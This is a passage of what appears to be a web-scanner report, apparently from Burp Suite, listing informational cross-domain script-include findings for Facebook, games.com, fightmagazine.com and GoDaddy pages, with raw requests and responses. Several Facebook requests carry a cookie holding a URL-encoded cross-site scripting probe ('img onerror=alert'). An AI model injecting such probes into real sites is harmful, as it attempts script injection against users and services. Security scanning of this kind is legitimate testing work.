<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.99. http://www.facebook.com/techcrunch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /techcrunch

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /techcrunch HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.25
Connection: close
Date: Thu, 05 May 2011 11:42:19 GMT
Content-Length: 39532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.100. http://www.facebook.com/terms.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /terms.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /terms.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.4.129
Connection: close
Date: Thu, 05 May 2011 10:56:50 GMT
Content-Length: 44062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.101. http://www.facebook.com/terms.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /terms.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /terms.php?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; wd=1022x1007; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.182.35
X-Cnection: close
Date: Thu, 05 May 2011 11:44:18 GMT
Content-Length: 43663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.102. http://www.facebook.com/theteebers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /theteebers

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /theteebers HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftheteebers; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.23
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 67960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.103. http://www.facebook.com/wmoppert

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /wmoppert

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /wmoppert HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fwmoppert; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.45
Connection: close
Date: Thu, 05 May 2011 11:42:10 GMT
Content-Length: 39263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.104. https://www.fightmagazine.com/mma-magazine/subscribe.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fightmagazine.com
Path:   /mma-magazine/subscribe.asp

Issue detail

The response dynamically includes the following scripts from other domains:
  • https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js
  • https://ajax.googleapis.com/ajax/libs/prototype/1.7.0.0/prototype.js
  • https://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js

Request

GET /mma-magazine/subscribe.asp HTTP/1.1
Host: www.fightmagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:57:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16739
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSSSACAT=OHOCLKNAGCJNELEGAPIKBNJM; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1" c
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/navbar-s.css">

<script type='text/javascript' src='https://ajax.googleapis.com/ajax/libs/prototype/1.7.0.0/prototype.js'></script>
<script type='text/javascript' src='https://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
...[SNIP]...

17.105. http://www.games.com/browse-games/all/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.games.com
Path:   /browse-games/all/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://js.adsonar.com/js/adsonar.js
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://o.aolcdn.com/feedback/feedback1.js
  • http://o.aolcdn.com/os/aol/jquery.getjs-1.0.min.js
  • http://o.aolcdn.com/os/games/scripts/initialize.js
  • http://o.aolcdn.com/os_merge/?file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.openwindow.min.js&file=/aol/jquery.aolshare.min.js
  • http://o.aolcdn.com/os_merge/?file=/games/scripts/jquery.min.js&file=/games/scripts/default.min.js&file=/header/js/jquery.globalheader-1.3.js&file=/header/js/jquery.globalsearchbox-1.3.js

Request

GET /browse-games/all/ HTTP/1.1
Host: www.games.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: recentGames=335;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:57:15 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO PSA OUR"
Content-Type: text/html;charset=UTF-8
Set-Cookie: recentGames=335; Expires=Wed, 03-Aug-2011 10:57:15 GMT; Path=/
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Length: 57597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- dpm-lm294 -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
<!-- Set Merge URL-->
<script type="text/javascript" src="http://o.aolcdn.com/os_merge/?file=/games/scripts/jquery.min.js&amp;file=/games/scripts/default.min.js&amp;file=/header/js/jquery.globalheader-1.3.js&amp;file=/header/js/jquery.globalsearchbox-1.3.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/os/aol/jquery.getjs-1.0.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<!-- BEGIN: FEEDBACK LINK JS -->
<script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>
...[SNIP]...
<!-- END: Global Games FootAppend --><script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery.sonar.min.js&amp;file=/aol/jquery.facebooksocial.min.js&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.openwindow.min.js&amp;file=/aol/jquery.aolshare.min.js" type="text/javascript"></script>

   <script type="text/javascript" src="http://o.aolcdn.com/os/games/scripts/initialize.js"></script>
...[SNIP]...

17.106. http://www.games.com/game-play/family-feud/single

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.games.com
Path:   /game-play/family-feud/single

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://js.adsonar.com/js/adsonar.js
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://o.aolcdn.com/feedback/feedback1.js
  • http://o.aolcdn.com/os/games/scripts/initialize.js
  • http://o.aolcdn.com/os/header/js/jquery.globalheader-1.3.js
  • http://o.aolcdn.com/os/header/js/jquery.globalsearchbox-1.3.js
  • http://o.aolcdn.com/os_merge/?file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.openwindow.min.js&file=/aol/jquery.aolshare.min.js
  • http://o.aolcdn.com/os_merge/?file=/games/scripts/jquery.min.js&file=/games/scripts/default.min.js&file=/header/js/jquery.globalheader-1.3.js&file=/header/js/jquery.globalsearchbox-1.3.js
  • http://platform.twitter.com/widgets.js
  • http://www.stumbleupon.com/hostedbadge.php?s=1

Request

GET /game-play/family-feud/single HTTP/1.1
Host: www.games.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: recentGames=335;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:57:16 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO PSA OUR"
Content-Type: text/html;charset=UTF-8
Set-Cookie: recentGames=335; Expires=Wed, 03-Aug-2011 10:57:16 GMT; Path=/
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Length: 31490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- dpm-lm234 -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
<!-- Set Merge URL-->
<script type="text/javascript" src="http://o.aolcdn.com/os_merge/?file=/games/scripts/jquery.min.js&amp;file=/games/scripts/default.min.js&amp;file=/header/js/jquery.globalheader-1.3.js&amp;file=/header/js/jquery.globalsearchbox-1.3.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<!-- BEGIN: Global Games HeadAppend -->

<script type="text/javascript" src="http://o.aolcdn.com/os/header/js/jquery.globalheader-1.3.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/os/header/js/jquery.globalsearchbox-1.3.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<a target="_blank"><script src="http://www.stumbleupon.com/hostedbadge.php?s=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<!-- BEGIN: FEEDBACK LINK JS -->
<script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>
...[SNIP]...
<!-- END: Global Games FootAppend --><script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery.sonar.min.js&amp;file=/aol/jquery.facebooksocial.min.js&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.openwindow.min.js&amp;file=/aol/jquery.aolshare.min.js" type="text/javascript"></script>

   <script type="text/javascript" src="http://o.aolcdn.com/os/games/scripts/initialize.js"></script>
...[SNIP]...

17.107. http://www.games.com/game/family-feud/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.games.com
Path:   /game/family-feud/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://eatps.web.aol.com:9000/open_web_adhoc?subtype=7051&sid=GAMES&game=335
  • http://js.adsonar.com/js/adsonar.js
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://o.aolcdn.com/feedback/feedback1.js
  • http://o.aolcdn.com/os/aol/jquery.getjs-1.0.min.js
  • http://o.aolcdn.com/os/games/scripts/initialize.js
  • http://o.aolcdn.com/os_merge/?file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.openwindow.min.js&file=/aol/jquery.aolshare.min.js
  • http://o.aolcdn.com/os_merge/?file=/games/scripts/jquery.min.js&file=/games/scripts/default.min.js&file=/header/js/jquery.globalheader-1.3.js&file=/header/js/jquery.globalsearchbox-1.3.js

Request

GET /game/family-feud/?icid=maing-grid7%7Cmain5%7Cdl11%7Csec3_lnk1%7C60483 HTTP/1.1
Host: www.games.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:42 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO PSA OUR"
Content-Type: text/html;charset=UTF-8
Set-Cookie: recentGames=335; Expires=Wed, 03-Aug-2011 00:59:42 GMT; Path=/
Content-Length: 72850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- dpm-lm294 -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
<!-- Set Merge URL-->
<script type="text/javascript" src="http://o.aolcdn.com/os_merge/?file=/games/scripts/jquery.min.js&amp;file=/games/scripts/default.min.js&amp;file=/header/js/jquery.globalheader-1.3.js&amp;file=/header/js/jquery.globalsearchbox-1.3.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/os/aol/jquery.getjs-1.0.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<!-- BEGIN: FEEDBACK LINK JS -->
<script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>
...[SNIP]...
<!-- END: Global Games FootAppend -->
<script type="text/javascript" src="http://eatps.web.aol.com:9000/open_web_adhoc?subtype=7051&sid=GAMES&game=335"></script><script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery.sonar.min.js&amp;file=/aol/jquery.facebooksocial.min.js&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.openwindow.min.js&amp;file=/aol/jquery.aolshare.min.js" type="text/javascript"></script>

   <script type="text/javascript" src="http://o.aolcdn.com/os/games/scripts/initialize.js"></script>
...[SNIP]...

17.108. https://www.godaddy.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js
  • https://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=1
  • https://img3.wsimg.com/fos/script/ProductAdvisor5.min.js
  • https://img3.wsimg.com/fos/script/QuickBuyInsert8.min.js
  • https://img3.wsimg.com/fos/script/ViewExtensionsInsert7.min.js
  • https://img3.wsimg.com/fos/script/atlantis_jquery8.min.js
  • https://img3.wsimg.com/fos/script/jquery.tablesorter.min.js
  • https://img3.wsimg.com/fos/script/sales15.min.js
  • https://img3.wsimg.com/pc/js/1/gd_js_20110426.min.js

Request

GET / HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2ot03x55n2cjbhmswxqzgtjx; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: SplitValue1=60; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:18 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:18 GMT
Connection: close
Content-Length: 267405


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<body id="ctl00_PageBody" style="width:100%;margin:0;">
   
<script src="https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!--HEADERBEGIN-->

<script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110426.min.js"></script>
...[SNIP]...
</style>

<script src="https://img3.wsimg.com/fos/script/QuickBuyInsert8.min.js" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="https://img3.wsimg.com/fos/script/atlantis_jquery8.min.js" type="text/javascript"></script>
...[SNIP]...
<div id="bottomPod02" style="width:1000px;height:192px;padding: 5px 0px 4px 0px;">

<script src="https://img3.wsimg.com/fos/script/ProductAdvisor5.min.js" type="text/javascript"></script>
...[SNIP]...
<div class="PodContainer">


<script src="https://img3.wsimg.com/fos/script/ViewExtensionsInsert7.min.js" type="text/javascript"></script>

<script src="https://img3.wsimg.com/fos/script/jquery.tablesorter.min.js" type="text/javascript"></script>
...[SNIP]...
</div>
       

<script src="https://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=1" type="text/javascript"></script>


<script src="https://img3.wsimg.com/fos/script/sales15.min.js" type="text/javascript"></script>
...[SNIP]...

17.109. https://www.godaddy.com/domains/search.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/search.aspx

Issue detail

The response dynamically includes the following scripts from other domains:
  • https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js
  • https://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=1
  • https://img3.wsimg.com/fos/script/atlantis_jquery8.js
  • https://img3.wsimg.com/fos/script/sales15.min.js
  • https://img3.wsimg.com/pc/js/1/gd_js_20110426.min.js

Request

GET /domains/search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=eaduka553tx3nvvrjumr4n23; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: SplitValue1=47; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:20 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:19 GMT
Connection: close
